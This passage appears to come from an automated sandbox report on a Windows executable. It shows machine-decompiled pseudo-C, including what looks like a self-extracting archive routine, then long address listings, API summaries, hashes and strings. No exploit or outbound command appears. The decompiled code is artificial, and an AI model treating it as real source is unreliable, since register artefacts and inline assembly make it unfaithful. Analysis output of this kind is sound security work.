											__ebp - 0xac8c = E00D94D7E(__ebp - 0xac8c, __ebp - 0xbc8c);
											_pop(__ecx);
											_pop(__ecx);
											__ebp - 0xac8c = E00D7B98D(__eflags, __ebp - 0xac8c);
											__ecx =  *(__ebp - 0x1c3c) & 0x0000ffff;
											__eax = __ebp - 0x1c3c;
											__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff);
											__edx = __ebp - 0x9c8c;
											__esi = __ebp - 0xac8c;
											asm("sbb ecx, ecx");
											__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c;
											 *(__ebp - 0x9c8c) & 0x0000ffff =  ~( *(__ebp - 0x9c8c) & 0x0000ffff);
											asm("sbb eax, eax");
											__eax =  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c;
											 *(__ebp - 0xac8c) & 0x0000ffff =  ~( *(__ebp - 0xac8c) & 0x0000ffff);
											__eax = __ebp - 0x15c8c;
											asm("sbb edx, edx");
											__edx =  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi;
											E00D89D41(__ebp - 0x15c8c) = __ebp - 0x2c3c;
											__ebp - 0xbc8c = E00D89450(__ecx, __edi, __ebp - 0xbc8c, __ebp - 0x2c3c,  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi, __ebp - 0xbc8c,  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c,  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c);
											__eflags =  *(__ebp - 0xcc8c);
											if( *(__ebp - 0xcc8c) != 0) {
												_push(__edi);
												__eax = __ebp - 0xcc8c;
												_push(__ebp - 0xcc8c);
												_push(5);
												_push(0x1000);
												__eax =  *0xdadef8();
											}
											goto L167;
										}
										goto L162;
									}
								}
							case 0xb:
								__eflags = __ebx - 7;
								if(__ebx == 7) {
									 *0xdb9600 = 1;
								}
								goto L167;
							case 0xc:
								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
								__eax = E00D959C0( *(__ebp - 0x5c84) & 0x0000ffff);
								__eflags = __eax - 0x46;
								if(__eax == 0x46) {
									 *0xdb75d4 = 1;
								} else {
									__eflags = __eax - 0x55;
									if(__eax == 0x55) {
										 *0xdb75d5 = 1;
									} else {
										__eax = 0;
										 *0xdb75d4 = __al;
										 *0xdb75d5 = __al;
									}
								}
								goto L167;
							case 0xd:
								 *0xdcde21 = 1;
								__eax = __eax + 0xdcde21;
								_t112 = __esi + 0x39;
								 *_t112 =  *(__esi + 0x39) + __esp;
								__eflags =  *_t112;
								__ebp = 0xffffa37c;
								if( *_t112 != 0) {
									_t114 = __ebp - 0x5c84; // 0xffff46f8
									__eax = _t114;
									_push(_t114);
									 *0xdad5fc = E00D813FC();
								}
								goto L167;
						}
						L4:
						_t220 = E00D89E24(_t220, _t296);
						_t296 = _t296 + 0x2000;
						_t293 = _t293 - 1;
						if(_t293 != 0) {
							goto L4;
						} else {
							_t297 = _t293;
							goto L6;
						}
						L167:
						_push(0x1000);
						_t205 = _t302 - 0xe; // 0xffffa36e
						_t206 = _t302 - 0xd; // 0xffffa36f
						_t207 = _t302 - 0x5c84; // 0xffff46f8
						_t208 = _t302 - 0xfc8c; // 0xfffea6f0
						_push( *((intOrPtr*)(_t302 + 0xc)));
						_t215 = E00D8A156();
						_t278 =  *((intOrPtr*)(_t302 + 0x10));
						 *((intOrPtr*)(_t302 + 0xc)) = _t215;
					} while (_t215 != 0);
				}
			}











              0x00d8b4c7
              0x00d8b4cc
              0x00d8b4d1
              0x00d8b4d6
              0x00d8b4df
              0x00d8c0c7
              0x00d8c0ca
              0x00d8c0d4
              0x00d8c0d4
              0x00d8b4e5
              0x00d8b4ed
              0x00d8b4f1
              0x00d8b4f8
              0x00d8b4ff
              0x00d8b500
              0x00d8b503
              0x00d8b50a
              0x00d8b50f
              0x00d8b516
              0x00d8b51b
              0x00d8b51d
              0x00d8b523
              0x00d8b529
              0x00d8b529
              0x00000000
              0x00d8b53e
              0x00d8b555
              0x00d8b559
              0x00000000
              0x00d8b55b
              0x00000000
              0x00d8b55b
              0x00d8b559
              0x00d8b563
              0x00000000
              0x00000000
              0x00d8b569
              0x00000000
              0x00d8b570
              0x00d8b573
              0x00000000
              0x00000000
              0x00d8b579
              0x00d8b586
              0x00d8b5ac
              0x00d8b5b7
              0x00d8b5c1
              0x00d8b5cc
              0x00d8b5d1
              0x00d8b5d9
              0x00d8b5df
              0x00d8b5e4
              0x00d8b5e6
              0x00d8b74b
              0x00d8b74b
              0x00d8b755
              0x00000000
              0x00d8b5ec
              0x00d8b5f2
              0x00d8b614
              0x00d8b623
              0x00d8b630
              0x00d8b641
              0x00d8b644
              0x00d8b647
              0x00d8b65a
              0x00d8b661
              0x00d8b666
              0x00d8b668
              0x00000000
              0x00000000
              0x00d8b66e
              0x00d8b675
              0x00d8b67a
              0x00d8b67f
              0x00d8b68b
              0x00d8b690
              0x00d8b693
              0x00d8b69a
              0x00d8b69c
              0x00d8b69d
              0x00d8b6a7
              0x00d8b6ad
              0x00d8b6ae
              0x00000000
              0x00d8b6ae
              0x00d8b650
              0x00d8b656
              0x00d8b658
              0x00000000
              0x00000000
              0x00000000
              0x00d8b6b4
              0x00d8b6bb
              0x00d8b6bd
              0x00d8b6c0
              0x00d8b730
              0x00d8b730
              0x00d8b738
              0x00d8b73e
              0x00d8b743
              0x00d8b745
              0x00d8b5f4
              0x00d8b5f9
              0x00d8b601
              0x00d8b607
              0x00d8b60e
              0x00000000
              0x00000000
              0x00000000
              0x00d8b60e
              0x00000000
              0x00d8b745
              0x00d8b6c9
              0x00d8b6cf
              0x00d8b6d1
              0x00000000
              0x00d8b6d3
              0x00d8b6d3
              0x00d8b6d5
              0x00d8b6d6
              0x00d8b6da
              0x00d8b6f2
              0x00d8b6f7
              0x00d8b701
              0x00d8b703
              0x00d8b706
              0x00d8b6d8
              0x00d8b6d8
              0x00d8b6d9
              0x00000000
              0x00d8b708
              0x00d8b716
              0x00d8b71c
              0x00d8b71e
              0x00d8b72a
              0x00d8b72a
              0x00000000
              0x00d8b71e
              0x00d8b706
              0x00d8b6d1
              0x00000000
              0x00d8b75f
              0x00d8b761
              0x00d8b7b4
              0x00d8b7b9
              0x00d8b7c2
              0x00d8b7c3
              0x00d8b7c9
              0x00d8b7ce
              0x00d8b7d1
              0x00d8b7d3
              0x00d8b7d5
              0x00d8b7da
              0x00d8b7dc
              0x00d8b7de
              0x00d8b7de
              0x00d8b7e0
              0x00d8b7e0
              0x00d8b7e5
              0x00d8b7ea
              0x00d8b7eb
              0x00d8b7eb
              0x00d8b7ec
              0x00d8b7ee
              0x00d8b7f5
              0x00d8b7fa
              0x00d8b7ee
              0x00000000
              0x00000000
              0x00d8b800
              0x00d8b802
              0x00d8b812
              0x00d8b812
              0x00000000
              0x00000000
              0x00d8b81d
              0x00d8b81f
              0x00000000
              0x00000000
              0x00d8b825
              0x00d8b82c
              0x00000000
              0x00000000
              0x00d8b832
              0x00d8b834
              0x00d8b83a
              0x00d8b83c
              0x00d8b843
              0x00d8b844
              0x00d8b84b
              0x00d8b84d
              0x00d8b84d
              0x00d8b854
              0x00d8b859
              0x00d8b85f
              0x00d8b861
              0x00000000
              0x00d8b867
              0x00d8b867
              0x00d8b86a
              0x00d8b86c
              0x00d8b86d
              0x00d8b870
              0x00d8b899
              0x00d8b899
              0x00d8b89c
              0x00d8b981
              0x00d8b98a
              0x00d8b98f
              0x00d8b98f
              0x00d8b991
              0x00d8b991
              0x00d8b993
              0x00d8b995
              0x00d8b99c
              0x00d8b9a1
              0x00d8b9a2
              0x00d8b9a3
              0x00d8b9a5
              0x00d8b9a7
              0x00d8b9ab
              0x00d8b9ad
              0x00d8b9ad
              0x00d8b9af
              0x00d8b9af
              0x00d8b9ab
              0x00d8b9b3
              0x00d8b9b9
              0x00d8b9c6
              0x00d8b9cd
              0x00d8b9dd
              0x00d8b9e7
              0x00d8b9ef
              0x00d8b9fb
              0x00d8b9fd
              0x00d8ba05
              0x00d8ba0a
              0x00d8ba0b
              0x00d8ba0c
              0x00d8ba0e
              0x00d8ba1b
              0x00d8ba24
              0x00d8ba24
              0x00000000
              0x00d8ba0e
              0x00d8b8a2
              0x00d8b8a5
              0x00d8b8b2
              0x00d8b8b2
              0x00d8b8b5
              0x00d8b8b7
              0x00d8b8b8
              0x00d8b8ba
              0x00d8b8bb
              0x00d8b8c0
              0x00d8b8c5
              0x00d8b8cb
              0x00d8b8cd
              0x00d8b8cf
              0x00d8b8d2
              0x00d8b8d9
              0x00d8b8da
              0x00d8b8e0
              0x00d8b8e1
              0x00d8b8e4
              0x00d8b8e5
              0x00d8b8e6
              0x00d8b8eb
              0x00d8b8ee
              0x00d8b8f4
              0x00d8b8fd
              0x00d8b900
              0x00d8b905
              0x00d8b907
              0x00d8b909
              0x00d8b90b
              0x00d8b90b
              0x00d8b90d
              0x00d8b90d
              0x00d8b90f
              0x00d8b90f
              0x00d8b917
              0x00d8b91e
              0x00d8b920
              0x00d8b927
              0x00d8b92d
              0x00d8b92f
              0x00d8b930
              0x00d8b938
              0x00d8b947
              0x00d8b947
              0x00d8b938
              0x00d8b952
              0x00d8b954
              0x00d8b963
              0x00d8b969
              0x00d8b96f
              0x00d8b97a
              0x00d8b97a
              0x00000000
              0x00d8b96f
              0x00d8b8a7
              0x00d8b8ac
              0x00000000
              0x00000000
              0x00000000
              0x00d8b8ac
              0x00d8b872
              0x00d8b876
              0x00000000
              0x00000000
              0x00d8b878
              0x00d8b87b
              0x00d8b87d
              0x00d8b880
              0x00000000
              0x00d8b886
              0x00d8b88f
              0x00000000
              0x00d8b88f
              0x00d8b880
              0x00000000
              0x00d8ba2b
              0x00d8ba2c
              0x00d8ba31
              0x00d8ba33
              0x00d8ba36
              0x00d8ba36
              0x00000000
              0x00d8ba6c
              0x00d8ba73
              0x00d8ba75
              0x00d8ba75
              0x00d8ba77
              0x00d8baa6
              0x00d8baa6
              0x00d8baac
              0x00000000
              0x00d8baac
              0x00d8ba79
              0x00d8ba79
              0x00d8ba7c
              0x00d8ba95
              0x00d8ba9b
              0x00d8ba9b
              0x00000000
              0x00d8ba9b
              0x00d8ba7e
              0x00d8ba7e
              0x00d8ba81
              0x00000000
              0x00000000
              0x00d8ba83
              0x00d8ba83
              0x00d8ba86
              0x00000000
              0x00000000
              0x00d8ba8c
              0x00000000
              0x00000000
              0x00d8baf9
              0x00d8bafc
              0x00000000
              0x00000000
              0x00d8bafe
              0x00d8bb0a
              0x00d8bb0f
              0x00d8bb10
              0x00d8bb11
              0x00d8bb13
              0x00000000
              0x00000000
              0x00d8bb15
              0x00000000
              0x00000000
              0x00d8bb5b
              0x00d8bb5e
              0x00d8bcdf
              0x00d8bcdf
              0x00d8bce2
              0x00d8bce8
              0x00d8bcef
              0x00d8bcf1
              0x00d8bcf1
              0x00d8bcfb
              0x00d8bcfb
              0x00000000
              0x00d8bce2
              0x00d8bb64
              0x00d8bb6a
              0x00d8bb78
              0x00d8bb84
              0x00d8bb86
              0x00d8bb88
              0x00d8bb8d
              0x00d8bb8d
              0x00d8bba5
              0x00d8bbb2
              0x00d8bbb7
              0x00d8bbb9
              0x00000000
              0x00000000
              0x00d8bb8b
              0x00d8bb8b
              0x00d8bb8c
              0x00d8bb8c
              0x00d8bbc5
              0x00d8bbcb
              0x00d8bbd3
              0x00000000
              0x00000000
              0x00d8bbd9
              0x00d8bbe0
              0x00000000
              0x00000000
              0x00d8bbe6
              0x00d8bbe8
              0x00d8bbef
              0x00d8bbf5
              0x00d8bbf7
              0x00d8bbf8
              0x00d8bbfd
              0x00d8bbfe
              0x00d8bbff
              0x00d8bc01
              0x00d8bc55
              0x00d8bc55
              0x00d8bc5d
              0x00d8bc6b
              0x00d8bc7c
              0x00d8bc8a
              0x00d8bc8a
              0x00d8bc96
              0x00d8bc9b
              0x00d8bc9d
              0x00d8bcad
              0x00d8bcb7
              0x00d8bcbc
              0x00d8bcbf
              0x00000000
              0x00d8bcc5
              0x00d8bcca
              0x00d8bcca
              0x00d8bccc
              0x00d8bcd3
              0x00d8bcd9
              0x00000000
              0x00d8bcd9
              0x00d8bcbf
              0x00d8bc03
              0x00d8bc05
              0x00d8bc07
              0x00d8bc0e
              0x00000000
              0x00000000
              0x00d8bc10
              0x00d8bc12
              0x00d8bc18
              0x00d8bc18
              0x00d8bc1c
              0x00000000
              0x00000000
              0x00d8bc1e
              0x00d8bc1f
              0x00d8bc25
              0x00d8bc28
              0x00d8bc2a
              0x00d8bc2d
              0x00000000
              0x00000000
              0x00000000
              0x00d8bc2f
              0x00d8bc3c
              0x00d8bc46
              0x00d8bc4b
              0x00d8bc4b
              0x00d8bc4d
              0x00000000
              0x00000000
              0x00d8bd07
              0x00d8bd0a
              0x00d8bd0c
              0x00d8bd13
              0x00d8bd15
              0x00d8bd1b
              0x00d8bd1c
              0x00d8bd21
              0x00d8bd22
              0x00d8bd22
              0x00d8bd27
              0x00d8bd2a
              0x00d8bd30
              0x00d8bd30
              0x00d8bd35
              0x00000000
              0x00000000
              0x00d8bd41
              0x00d8bd44
              0x00d8bb25
              0x00d8bb25
              0x00000000
              0x00d8bb25
              0x00d8bd4a
              0x00d8bb16
              0x00d8bb16
              0x00d8bb1c
              0x00d8bb1d
              0x00d8bb20
              0x00000000
              0x00000000
              0x00d8bd51
              0x00d8bd54
              0x00000000
              0x00000000
              0x00d8bd5a
              0x00d8bd5c
              0x00d8bd63
              0x00d8bd6b
              0x00d8bd71
              0x00d8bd76
              0x00d8bd79
              0x00d8bdae
              0x00d8bdb3
              0x00d8bdb9
              0x00d8bdba
              0x00d8bdbf
              0x00d8bd7b
              0x00d8bd7b
              0x00d8bd7e
              0x00d8bd84
              0x00d8bd9a
              0x00d8bd9f
              0x00d8bda0
              0x00d8bda5
              0x00d8bd86
              0x00d8bd86
              0x00d8bd8b
              0x00d8bd8c
              0x00d8bd91
              0x00d8bd91
              0x00d8bd84
              0x00d8bdc6
              0x00d8bdc8
              0x00d8bdcf
              0x00d8bddd
              0x00d8bde4
              0x00d8bde9
              0x00d8bdea
              0x00d8bdeb
              0x00d8bded
              0x00d8bdee
              0x00d8bdf5
              0x00d8be45
              0x00d8be4a
              0x00d8be4c
              0x00000000
              0x00000000
              0x00d8be52
              0x00d8be54
              0x00d8be5a
              0x00d8be61
              0x00000000
              0x00000000
              0x00d8be63
              0x00d8be65
              0x00d8be66
              0x00d8be66
              0x00d8be69
              0x00d8be6c
              0x00d8be76
              0x00d8be76
              0x00d8be78
              0x00d8be7a
              0x00d8be84
              0x00d8be89
              0x00d8be8b
              0x00d8bec9
              0x00d8becc
              0x00d8becc
              0x00d8bece
              0x00d8becf
              0x00d8becf
              0x00000000
              0x00d8becf
              0x00d8be8d
              0x00d8be8f
              0x00d8be90
              0x00d8be92
              0x00d8be95
              0x00d8beaa
              0x00d8beac
              0x00d8bead
              0x00d8bead
              0x00d8beb0
              0x00d8beb0
              0x00d8beb5
              0x00d8beb6
              0x00d8bebc
              0x00d8bebc
              0x00d8bebd
              0x00d8bec2
              0x00d8bec3
              0x00d8bec4
              0x00000000
              0x00d8bec4
              0x00d8be97
              0x00d8be9e
              0x00d8bea1
              0x00d8bea2
              0x00000000
              0x00d8bea2
              0x00d8be6e
              0x00d8be70
              0x00d8be71
              0x00d8be74
              0x00000000
              0x00000000
              0x00000000
              0x00d8bed1
              0x00d8bed1
              0x00d8bed4
              0x00d8bed4
              0x00d8bed9
              0x00d8bedb
              0x00d8bedd
              0x00d8bedd
              0x00d8bedf
              0x00d8bedf
              0x00000000
              0x00d8bdf7
              0x00d8bdfe
              0x00d8be0a
              0x00d8be10
              0x00d8be11
              0x00d8be12
              0x00d8be17
              0x00d8be1a
              0x00d8be1c
              0x00d8be22
              0x00d8be24
              0x00d8be32
              0x00d8be37
              0x00d8be38
              0x00d8be38
              0x00d8bee2
              0x00d8bee2
              0x00d8beea
              0x00d8beef
              0x00d8bef1
              0x00d8bef2
              0x00d8bef8
              0x00d8bef9
              0x00d8beff
              0x00d8bf00
              0x00d8bf00
              0x00d8bf05
              0x00d8bf06
              0x00d8bf0c
              0x00d8bf0d
              0x00d8bf13
              0x00d8bf14
              0x00d8bf19
              0x00d8bf21
              0x00d8bf2d
              0x00d8bf2d
              0x00d8bf3a
              0x00d8bf3f
              0x00d8bf47
              0x00d8bf51
              0x00d8bf5e
              0x00d8bf65
              0x00d8bf65
              0x00d8bf71
              0x00d8bf78
              0x00d8bf7d
              0x00d8bf85
              0x00d8bf8b
              0x00d8bf8c
              0x00d8bf8d
              0x00d8bf8f
              0x00d8bf8f
              0x00d8bfa4
              0x00d8bfa9
              0x00d8bfb5
              0x00d8bfb7
              0x00d8bfc8
              0x00d8bfd5
              0x00000000
              0x00d8bfb9
              0x00d8bfc4
              0x00d8bfc6
              0x00d8bfda
              0x00d8bfda
              0x00d8bfdc
              0x00d8bfe2
              0x00d8bfe8
              0x00d8bff6
              0x00d8bffb
              0x00d8bffc
              0x00d8c004
              0x00d8c009
              0x00d8c010
              0x00d8c016
              0x00d8c018
              0x00d8c01e
              0x00d8c024
              0x00d8c026
              0x00d8c02f
              0x00d8c032
              0x00d8c034
              0x00d8c03d
              0x00d8c040
              0x00d8c046
              0x00d8c049
              0x00d8c052
              0x00d8c061
              0x00d8c066
              0x00d8c06e
              0x00d8c070
              0x00d8c071
              0x00d8c077
              0x00d8c078
              0x00d8c07a
              0x00d8c07f
              0x00d8c07f
              0x00000000
              0x00d8c06e
              0x00000000
              0x00d8bfc6
              0x00d8bfb7
              0x00000000
              0x00d8c087
              0x00d8c08a
              0x00d8c08c
              0x00d8c08c
              0x00000000
              0x00000000
              0x00d8bab8
              0x00d8bac0
              0x00d8bac6
              0x00d8bac9
              0x00d8baed
              0x00d8bacb
              0x00d8bacb
              0x00d8bace
              0x00d8bae1
              0x00d8bad0
              0x00d8bad0
              0x00d8bad2
              0x00d8bad7
              0x00d8bad7
              0x00d8bace
              0x00000000
              0x00000000
              0x00d8bb31
              0x00d8bb32
              0x00d8bb37
              0x00d8bb37
              0x00d8bb37
              0x00d8bb3a
              0x00d8bb3f
              0x00d8bb45
              0x00d8bb45
              0x00d8bb4b
              0x00d8bb51
              0x00d8bb51
              0x00000000
              0x00000000
              0x00d8b52a
              0x00d8b52c
              0x00d8b531
              0x00d8b537
              0x00d8b53a
              0x00000000
              0x00d8b53c
              0x00d8b53c
              0x00000000
              0x00d8b53c
              0x00d8c093
              0x00d8c093
              0x00d8c098
              0x00d8c09c
              0x00d8c0a0
              0x00d8c0a7
              0x00d8c0ae
              0x00d8c0b1
              0x00d8c0b6
              0x00d8c0b9
              0x00d8c0bc
              0x00d8c0c6

              APIs
              • __EH_prolog.LIBCMT ref: 00D8B4CC
                • Part of subcall function 00D8A156: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00D8A21E
              • SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,00D8ADDF,?,00000000), ref: 00D8B601
              • GetFileAttributesW.KERNEL32(?), ref: 00D8B6BB
              • DeleteFileW.KERNEL32(?), ref: 00D8B6C9
              • SetWindowTextW.USER32(?,?), ref: 00D8B812
              • _wcsrchr.LIBVCRUNTIME ref: 00D8B99C
              • GetDlgItem.USER32(?,00000066), ref: 00D8B9D7
              • SetWindowTextW.USER32(00000000,?), ref: 00D8B9E7
              • SendMessageW.USER32(00000000,00000143,00000000,00DB9602), ref: 00D8B9FB
              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00D8BA24
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
              • API String ID: 3676479488-312220925
              • Opcode ID: 8385bd745c689777c55f1fb2a8122e0b4bf1f54715d7c9f4a88d70fe75a70447
              • Instruction ID: 4b03427d131d3b8110bae826717147f15494b90c5845d1c0d72470d87bf6125c
              • Opcode Fuzzy Hash: 8385bd745c689777c55f1fb2a8122e0b4bf1f54715d7c9f4a88d70fe75a70447
              • Instruction Fuzzy Hash: C2E15E76900219AAEF24BBA4DD85EEE77BCEF05350F0440A6F549E7151EB709B848FB0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D7CFD0, Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 557COMMON
              Download Yara Rule
              C-Code - Quality: 89%
              			E00D7CFD0(signed int __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t196;
				void* _t197;
				WCHAR* _t198;
				void* _t203;
				signed int _t212;
				signed int _t215;
				signed int _t218;
				signed int _t228;
				void* _t229;
				void* _t232;
				signed int _t235;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t244;
				signed int _t248;
				signed int _t262;
				signed int _t267;
				signed int _t268;
				signed int _t270;
				signed int _t272;
				signed int _t273;
				void* _t274;
				signed int _t279;
				char* _t280;
				signed int _t284;
				short _t287;
				void* _t288;
				signed int _t294;
				signed int _t299;
				void* _t302;
				void* _t304;
				void* _t307;
				signed int _t316;
				signed int _t318;
				unsigned int _t328;
				signed int _t330;
				unsigned int _t333;
				signed int _t336;
				void* _t343;
				signed int _t348;
				signed int _t351;
				signed int _t352;
				signed int _t357;
				signed int _t361;
				void* _t370;
				signed int _t372;
				signed int _t373;
				void* _t374;
				void* _t375;
				intOrPtr* _t376;
				signed int _t377;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t387;
				signed int _t389;
				signed int* _t390;
				void* _t391;
				void* _t392;
				void* _t394;
				void* _t398;
				void* _t399;

				_t370 = __edx;
				_t318 = __ecx;
				_t392 = _t391 - 0x6c;
				E00D8D870(E00DA13DF, _t390);
				E00D8D940();
				_t196 = 0x5c;
				_push(0x427c);
				_push(_t390[0x1e]);
				_t387 = _t318;
				_t390[0x11] = _t196;
				_t390[0x12] = _t387;
				_t197 = E00D90BB8(_t318);
				_t316 = 0;
				_t396 = _t197;
				_t198 = _t390 - 0x1264;
				if(_t197 != 0) {
					E00D7FAB1(_t198, _t390[0x1e], 0x800);
				} else {
					GetModuleFileNameW(0, _t198, 0x800);
					 *((short*)(E00D7B943(_t396, _t390 - 0x1264))) = 0;
					E00D7FA89(_t396, _t390 - 0x1264, _t390[0x1e], 0x800);
				}
				E00D7943C(_t390 - 0x2288);
				_push(4);
				 *(_t390 - 4) = _t316;
				_push(_t390 - 0x1264);
				if(E00D79768(_t390 - 0x2288, _t387) == 0) {
					L57:
					_t203 = E00D7946E(_t390 - 0x2288); // executed
					 *[fs:0x0] =  *((intOrPtr*)(_t390 - 0xc));
					return _t203;
				} else {
					_t380 = _t316;
					_t398 =  *0xdad5f4 - _t380; // 0x63
					if(_t398 <= 0) {
						L7:
						E00D95030(_t316, _t380, _t387,  *_t387,  *((intOrPtr*)(_t387 + 4)), 4, E00D7CC62);
						E00D95030(_t316, _t380, _t387,  *((intOrPtr*)(_t387 + 0x14)),  *((intOrPtr*)(_t387 + 0x18)), 4, E00D7CBC7);
						_t394 = _t392 + 0x20;
						_t390[0x1e] = _t316;
						_t381 = _t380 | 0xffffffff;
						_t390[0x16] = _t316;
						_t390[0x19] = _t381;
						while(_t381 == 0xffffffff) {
							_t390[0x1b] = E00D79B57();
							_t294 = E00D79979(_t370, _t390 - 0x4288, 0x2000);
							_t390[0x17] = _t294;
							_t384 = _t316;
							_t25 = _t294 - 0x10; // -16
							_t361 = _t25;
							_t390[0x15] = _t361;
							if(_t361 < 0) {
								L25:
								_t295 = _t390[0x1b];
								_t381 = _t390[0x19];
								L26:
								E00D79A4C(_t390 - 0x2288, _t390, _t295 + _t390[0x17] + 0xfffffff0, _t316, _t316);
								_t299 = _t390[0x16] + 1;
								_t390[0x16] = _t299;
								__eflags = _t299 - 0x100;
								if(_t299 < 0x100) {
									continue;
								}
								__eflags = _t381 - 0xffffffff;
								if(_t381 == 0xffffffff) {
									goto L57;
								}
								break;
							}
							L10:
							while(1) {
								if( *((char*)(_t390 + _t384 - 0x4288)) != 0x2a ||  *((char*)(_t390 + _t384 - 0x4287)) != 0x2a) {
									L14:
									_t370 = 0x2a;
									if( *((intOrPtr*)(_t390 + _t384 - 0x4288)) != _t370) {
										L18:
										if( *((char*)(_t390 + _t384 - 0x4288)) != 0x52 ||  *((char*)(_t390 + _t384 - 0x4287)) != 0x61) {
											L21:
											_t384 = _t384 + 1;
											if(_t384 > _t390[0x15]) {
												goto L25;
											}
											_t294 = _t390[0x17];
											continue;
										} else {
											_t302 = E00D95460(_t390 - 0x4286 + _t384, 0xda261c, 4);
											_t394 = _t394 + 0xc;
											if(_t302 == 0) {
												goto L57;
											}
											goto L21;
										}
									}
									_t366 = _t390 - 0x4284 + _t384;
									if( *((intOrPtr*)(_t390 - 0x4284 + _t384 - 2)) == _t370 && _t384 <= _t294 + 0xffffffe0) {
										_t304 = E00D94DA0(_t366, L"*messages***", 0xb);
										_t394 = _t394 + 0xc;
										if(_t304 == 0) {
											_t390[0x1e] = 1;
											goto L24;
										}
									}
									goto L18;
								} else {
									_t307 = E00D95460(_t390 - 0x4286 + _t384, "*messages***", 0xb);
									_t394 = _t394 + 0xc;
									if(_t307 == 0) {
										L24:
										_t295 = _t390[0x1b];
										_t381 = _t384 + _t390[0x1b];
										_t390[0x19] = _t381;
										goto L26;
									}
									_t294 = _t390[0x17];
									goto L14;
								}
							}
						}
						asm("cdq");
						E00D79A4C(_t390 - 0x2288, _t390, _t381, _t370, _t316);
						_push(0x200002);
						_t382 = E00D92B53(_t390 - 0x2288);
						_t390[0x1a] = _t382;
						__eflags = _t382;
						if(_t382 == 0) {
							goto L57;
						}
						_t328 = E00D79979(_t370, _t382, 0x200000);
						_t390[0x19] = _t328;
						__eflags = _t390[0x1e];
						if(_t390[0x1e] == 0) {
							_push(2 + _t328 * 2);
							_t212 = E00D92B53(_t328);
							_t390[0x1e] = _t212;
							__eflags = _t212;
							if(_t212 == 0) {
								goto L57;
							}
							_t330 = _t390[0x19];
							 *(_t330 + _t382) = _t316;
							__eflags = _t330 + 1;
							E00D80FDE(_t382, _t212, _t330 + 1);
							L00D92B4E(_t382);
							_t382 = _t390[0x1e];
							_t333 = _t390[0x19];
							_t390[0x1a] = _t382;
							L33:
							_t215 = 0x100000;
							__eflags = _t333 - 0x100000;
							if(_t333 <= 0x100000) {
								_t215 = _t333;
							}
							 *((short*)(_t382 + _t215 * 2)) = 0;
							E00D7FA56(_t390 - 0xd4, 0xda2624, 0x64);
							_push(0x20002);
							_t218 = E00D92B53(0);
							_t390[0x1b] = _t218;
							__eflags = _t218;
							if(_t218 != 0) {
								__eflags = _t390[0x19];
								_t336 = _t316;
								_t371 = _t316;
								_t390[0x1e] = _t336;
								 *_t390 = _t316;
								_t383 = _t316;
								_t390[0x17] = _t316;
								if(_t390[0x19] <= 0) {
									L54:
									E00D7CB33(_t387, _t371, _t390, _t218, _t336);
									L00D92B4E(_t390[0x1a]);
									L00D92B4E(_t390[0x1b]);
									__eflags =  *((intOrPtr*)(_t387 + 0x2c)) - _t316;
									if( *((intOrPtr*)(_t387 + 0x2c)) <= _t316) {
										L56:
										 *0xdb0124 =  *((intOrPtr*)(_t387 + 0x28));
										E00D95030(_t316, _t383, _t387,  *((intOrPtr*)(_t387 + 0x3c)),  *((intOrPtr*)(_t387 + 0x40)), 4, E00D7CD08);
										E00D95030(_t316, _t383, _t387,  *((intOrPtr*)(_t387 + 0x50)),  *((intOrPtr*)(_t387 + 0x54)), 4, E00D7CD37);
										goto L57;
									} else {
										goto L55;
									}
									do {
										L55:
										E00D83393(_t387 + 0x3c, _t371, _t316);
										E00D83393(_t387 + 0x50, _t371, _t316);
										_t316 = _t316 + 1;
										__eflags = _t316 -  *((intOrPtr*)(_t387 + 0x2c));
									} while (_t316 <  *((intOrPtr*)(_t387 + 0x2c)));
									goto L56;
								}
								_t390[0x14] = 0xd;
								_t390[0x13] = 0xa;
								_t390[0x15] = 9;
								do {
									_t228 = _t390[0x1a];
									__eflags = _t383;
									if(_t383 == 0) {
										L80:
										_t372 =  *(_t228 + _t383 * 2) & 0x0000ffff;
										_t383 = _t383 + 1;
										__eflags = _t372;
										if(_t372 == 0) {
											break;
										}
										__eflags = _t372 - _t390[0x11];
										if(_t372 != _t390[0x11]) {
											_t229 = 0xd;
											__eflags = _t372 - _t229;
											if(_t372 == _t229) {
												L99:
												E00D7CB33(_t387, _t390[0x17], _t390, _t390[0x1b], _t336);
												 *_t390 = _t316;
												_t336 = _t316;
												_t390[0x17] = _t316;
												L98:
												_t390[0x1e] = _t336;
												goto L52;
											}
											_t232 = 0xa;
											__eflags = _t372 - _t232;
											if(_t372 == _t232) {
												goto L99;
											}
											L96:
											__eflags = _t336 - 0x10000;
											if(_t336 >= 0x10000) {
												goto L52;
											}
											 *(_t390[0x1b] + _t336 * 2) = _t372;
											_t336 = _t336 + 1;
